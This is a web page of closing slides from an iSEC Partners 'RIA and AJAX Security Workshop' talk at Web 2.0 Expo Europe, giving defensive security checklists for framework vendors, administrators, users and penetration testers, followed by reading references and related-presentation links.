Security Checklist RIA Framework Vendors RIA Framework Vendors Install Mechanisms Learn from Microsoft’s mistakes They invented RIA with ActiveX ActiveX’s Legacy: Malware Bad guys can get certs. We have a code signing cert from Verisign, and we’re professional bad guys Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 78 / 90

Security Checklist RIA Framework Vendors RIA Framework Vendors Install Mechanisms Users will click yes enough to invite abuse We need to start taking security UI seriously Do not allow self-signed anything without setting an external developer bit Install needs to take longer Watch out for install window DoSing to force a “yes” Using .exe download and install as baseline is not acceptable RIA frameworks need an equivalent to ActiveX killbits Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 79 / 90

Security Checklist RIA Framework Vendors RIA Framework Vendors Attack Surfaces RIA Frameworks are expanding security attack surface Audio codecs Video codecs IL Parser / Virtual Machine Embedded HTML renderer, JavaScript engine, image libraries Users do not understand the danger Too many exploits will lead to backlash, mass uninstall Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 80 / 90

Security Checklist Users and Administrators Users and Administrators Advice for Corporate Admins Disallow install of RIA frameworks without legitimate business need For Windows, GPO can disable per CLSID Once installed, IEAK becomes useless in enforcing policy in alternative installers Discourage development teams from using RIA unnecessarily Understand local framework settings that you can set remotely Disable self-signed AIR install Block blobs at border proxy if necessary Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 81 / 90

Security Checklist Users and Administrators Users and Administrators Advice for Normal People Don’t install frameworks you don’t need Use NoScript or equivalent to block JS/Flash/Silverlight instantiation except when you want it Read install boxes carefully Buy gold, guns, and canned food Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 82 / 90

Security Checklist Penetration Testers Penetration Testers Identify parameters used on instantiation Ensure SQL statements are parameterized Data stores not subject to same-origin—ensure proper GUIDs are used Check for limits on storage mechanism invocations Identify mechanisms used for letting the app framework talk directly to page content Make people use SSL! Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 83 / 90

Summary Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 84 / 90

Summary Summary RIA frameworks widely differ in their security models It is highly likely that web developers will introduce interesting flaws into their desktop applications The Web is becoming less standardized, more complex, and much more dangerous To Be Done Automated auditing tools for these frameworks are necessary Detailed per-framework checklists need to be created Plenty of bugs to find for everyone Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 85 / 90

Q&A Q&A Thanks for coming! Questions? https://www.isecpartners.com Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 86 / 90

Q&A Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 87 / 90

Appendix For Further Reading For Further Reading I Lutz Roeder. Reflector for .NET http://www.aisto.com/roeder/dotnet/ Kevin Kelly, Gary Wolf Kiss your browser goodbye: The radical future of media beyond the Web Wired 5.03. March, 1997 Ian Hickson, David Hyatt A vocabulary and associated APIs for HTML and XHTML http://www.w3.org/html/wg/html5/—July 1 2008 Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 88 / 90

Appendix For Further Reading For Further Reading II The Mozilla Corporation Interaction between privileged and non-privileged pages http://developer.mozilla.org/en/docs/Code_snippets: Interaction_between_privileged_and_non-privileged_pages Adobe Security Team Adobe AIR 1.0 Security White Paper http://download.macromedia.com/pub/air/documentation/1/ air_security.pdf Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 89 / 90

Add a comment

Related presentations

Presentación que realice en el Evento Nacional de Gobierno Abierto, realizado los ...

In this presentation we will describe our experience developing with a highly dyna...

Presentation to the LITA Forum 7th November 2014 Albuquerque, NM

Un recorrido por los cambios que nos generará el wearabletech en el futuro

Um paralelo entre as novidades & mercado em Wearable Computing e Tecnologias Assis...

Microsoft finally joins the smartwatch and fitness tracker game by introducing the...

Related pages

RIA Security Workshop - O'Reilly Media

RIA Security Workshop: Blurring the Line between Web and Desktop Security Alex Stamos David Thiel Justine Osborne iSEC Partners 21 October, 2008 Stamos ...
Read more

RIA and Ajax Security Workshop – Web 2.0 Expo Berlin ...

There is a huge disparity in features and security design. Why use RIA. to increase responsiveness; desktop integration; ... RIA And AJAX Security Workshop ...
Read more

RIA And AJAX Security Workshop, Part 1 - 豆丁网

RIA And AJAX Security Workshop, Part 1 ... iSECPartners.comRIA AJAXSecurity Workshop Web 2.0 Expo Europe 21 October, 2008 Part Web2.0 Security Alex Stamos ...
Read more

ISECPartners.com RIA and AJAX Security Workshop Web 2.0 ...

ISECPartners.com RIA and AJAX Security Workshop Web 2.0 Expo Europe 21 October, 2008 Part 1: AJAX and Web 2.0 Security Alex Stamos alex@isecpartners.com.
Read more

RIA and Ajax Security Workshop Presentation.ppt - taodocs.com

RIA and AJAX Security WorkshopWeb 2.0 Expo Europe21 October, 2008Part 1: AJAX and Web 2.0 SecurityAlex Stamosalex@ Partners, Inc2Agenda Introduction– Who ...
Read more

RIA and Ajax Security Workshop Presentation.ppt - Documents

Search; Home; Documents; RIA and Ajax Security Workshop Presentation.ppt
Read more

WCF Workshop Part 6 (Securing your Service Part 2 Message ...

... (Securing your Service Part 2 Message Encryption) ... As I talk about in the workshop, point-to-point security ... What is .net RIA Services?
Read more

Web Security: part 1 | Many PPT

Web Security: part 1 Vulnerability Stats: ... RIA and Ajax Security Workshop Presentation RIA and AJAX Security Workshop . Web 2.0 Expo Europe. 21 October, ...
Read more

Presentation Files: Web 2.0 Expo Europe 2008 - Co-produced ...

Web 2.0 Expo Europe 2008 Speaker Presentation Files. ... Web 2.0 has given birth to many more online channels; ... RIA And AJAX Security Workshop, Part 1.
Read more

WCF Workshop Part 5 (Securing your Service Part 1)

WCF Workshop Part 5 (Securing your Service Part 1) ... Part 3: Accessing Security and Authentication ... 3 RTM and .NET RIA Services July Update: Part ...
Read more